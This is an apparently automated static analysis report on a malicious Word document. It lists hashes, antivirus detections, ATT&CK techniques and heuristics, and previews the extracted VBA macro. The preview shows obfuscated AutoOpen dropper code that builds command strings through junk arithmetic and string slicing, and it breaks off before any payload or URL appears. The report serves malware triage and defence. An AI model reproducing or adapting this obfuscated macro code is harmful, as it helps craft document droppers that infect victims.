Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cd9378a35f3da7ad…

MALICIOUS

Office (OLE)

212.0 KB Created: 2018-03-06 14:36:00 Authoring application: Microsoft Office Word First seen: 2018-11-20
MD5: 740b14344cf8d162e9765693d4d2d464 SHA-1: ad323b240ce128b3af68e42b64b4aa47c1d5005b SHA-256: cd9378a35f3da7adc5976215b1171fc9bfafb7961e7b8fe5da980986d679454a
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and utilizes CreateObject to likely download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6480315-0' further supports its malicious nature as a dropper.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6465338-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6465338-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 63002 bytes
SHA-256: 392aa16edcedab20b564430c2e6a271c64c1d19f15aa5a9e6b7e2fa1e0c4c25a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 25 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ofpUfbza"
Function oZIWczOIklGA()
On Error Resume Next
GhoTS = "iwTUIiFATDp=%qSNfnEArwdRTiHlKkSEOOiLwMhXWXXVoarEKZGoX"
AUiHwtrI = 8010122 / Atn(XiuwaHzb) / (2719320 - DjPPGnbz / 9069421 - Sqr(kzCipNNN * CStr(nvFUnXQd / Sgn(9270891 - CDate(412284 / WfzTAjhpjdKvsV * 5989874 * Sqr(cPINulLaX))))) + (PcspJiwwzFzidG - 6232713 / 4646561 / CLng(6383490)))
TbfiJVkYN = 7445966 / Atn(AMzHzoOnoC) / (7133690 - XvCUEwqT / 6018337 - Sqr(uXaZtlBjWEYwXl * CStr(UvBvrHvM / Sgn(7173114 - CDate(5435795 / ambbqSwBRbhY * 8950619 * Sqr(lIjjubYREk))))) + (oYoqz - 2241033 / 7836504 / CLng(9469916)))
PiaIzCuhcp = dkclQLYqi + dd333h3sd(GhoTS, 26, 19)
puZlcrj = "zmSkSDv&!%2rav%!=tKwcSmji"
pwvHTnlSWEZ = 9580646 / Atn(EhODzuGSwYjrP) / (3987424 - qVLpSowRW / 7484085 - Sqr(ILFYhRMapPGmc * CStr(cRwFQXZUvQ / Sgn(1449091 - CDate(5874880 / fDFQs * 3097487 * Sqr(luNYr))))) + (ipfGkji - 2778543 / 8078755 / CLng(4514046)))
RbUsz = 112562 / Atn(FPVoPoQ) / (566787 - hWkzOWY / 7821740 - Sqr(DaOBsjopjYv * CStr(pfEEmAizfYHoC / Sgn(9589740 - CDate(3561209 / HVMKZITazEWmza * 1566703 * Sqr(HWrrfubVpqCfS))))) + (zuRthKLlQj - 2305040 / 5769770 / CLng(1449442)))
ipKHwlaiTq = LPFuNG + dd333h3sd(puZlcrj, 9, 10)
ztZkwqLJt = "tdnjinBLWhq%8rav% tes&&re=%jVcoqvzKYirAXHjdZo"
tPcHStBLvt = 7251070 / Atn(WhvstQtQUnqRzR) / (1411369 - OwRmmUGzLohXi / 1957642 - Sqr(rXdivpu * CStr(KfPsRiSJOuZa / Sgn(3895646 - CDate(6388536 / JBbvjFiWiKcwtU * 6780184 * Sqr(BTLHHWb))))) + (RsiTdIjrKYTj - 3859271 / 8943390 / CLng(2703815)))
GVUHuj = 6140323 / Atn(JhipjZpijX) / (1376970 - ZsnZnd / 7718065 - Sqr(PtZaknVACr * CStr(Ffjzot / Sgn(9837091 - CDate(6422628 / potlcikf * 6233354 * Sqr(jQZEMQ))))) + (HEwEoc - 8429417 / 3122722 / CLng(295462)))
qWkcFPS = iwwEQOhfGbP + dd333h3sd(ztZkwqLJt, 19, 16)
UiHWvRrma = "VVnNbAkisIJsHPSnOrQSb&&p=%1rav% teiwKRf"
ZFnwab = 4662305 / Atn(BkDhKiLP) / (518577 - wswGRASEFicXTz / 8948481 - Sqr(XpSNaZJzKsp * CStr(qzTFsJE / Sgn(4842158 - CDate(5417865 / Nwqvbq * 8250192 * Sqr(RFmiKWwpUW))))) + (zvZLHOHOXiJ - 8808633 / 4106329 / CLng(670478)))
aQCfcmG = 2880142 / Atn(TXfwTGhajY) / (2256069 - zIDphqcMnnij / 3821293 - Sqr(TzHLRbvucR * CStr(YPtOwbiCUROa / Sgn(3981175 - CDate(2350869 / aCnjowirmi * 3698965 * Sqr(HkrCjmAJb))))) + (zpMAizKFYmz - 7391066 / 132749 / CLng(8684717)))
bEOYLN = tuwjowUlaz + dd333h3sd(UiHWvRrma, 6, 13)
iTfVSM = "ELrQjOBBHhthnsWhDliBKrMtNJiWntffFhbEoLCcqSQQF% tes&&!%1Wm"
fhzsL = 7521805 / Atn(ToAODt) / (1964174 - TiscZDIIjw / 117544 - Sqr(RaNGDQwl * CStr(UIUjq / Sgn(2286975 - CDate(4000964 / kKtifvdQKjWE * 3772703 * Sqr(dJTqt))))) + (tLmzYczWXv - 6883381 / 8480678 / CLng(7702190)))
zrCGwiFKz = 3973251 / Atn(mGolikpthajiRf) / (2069493 - zStuYXw / 1198118 - Sqr(wHsOz * CStr(QwCqCfEOqD / Sgn(3559867 - CDate(1002418 / rthrNjjZu * 5046703 * Sqr(OJiiidziiw))))) + (jPoHjvDD - 8248380 / 1223441 / CLng(3507821)))
zpBvz = wdpuXG + dd333h3sd(iTfVSM, 3, 18)
pBtFNZSzGMI = "HsblaChfYihq=%DwGiCvEMcufUfnRPrFQj"
zdomDWzR = 1216031 / Atn(KsviqRDzSW) / (7031521 - LkjqFd / 4938585 - Sqr(XrzzPNZVdwJkMo * CStr(HCWLRiaDiGOj / Sgn(4731468 - CDate(6390834 / ZDjKDSuzPc * 8604509 * Sqr(VTMAwXwYnjS))))) + (RzoSrB - 6391015 / 97736 / CLng(7726557)))
LAzkI = 9769244 / Atn(GEBkVMFHi) / (4803764 - EjSGSIcIrqlYtG / 5827457 - Sqr(GNvstXvGwu * CStr(aMibjiUtFAli / Sgn(4695465 - CDate(4670464 / HiUjIirkwtm * 6296983 * Sqr(joLJX))))) + (BvIPBpZMZ - 5208729 / 4028534 / CLng(5969849)))
PnkwIi = OJPPfiPEWY + dd333h3sd(pBtFNZSzGMI, 17, 15)
lOwjZw = "BKOtrhRVtzcocqEOzbI"
fhADVu = 272900 / Atn(OWzfERXL) / (8619225 - rNqIDVcYHvW / 4585158 - Sqr(ZQuIGNtSFOHX * CStr(GvNszYCOYwJZE / Sgn(9886977 - CDate(912431 / sGwqjXOJJRwzNl * 9662920 * Sqr(kLOjLOvzVYB))))) + (liBNoUNI - 2238902 / 6260837 / CLng(1491316)))
VfNmnzYbP = 6648771 / Atn(DjiZDBmAaos) / (7042944 - ldKwVLWvY / 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.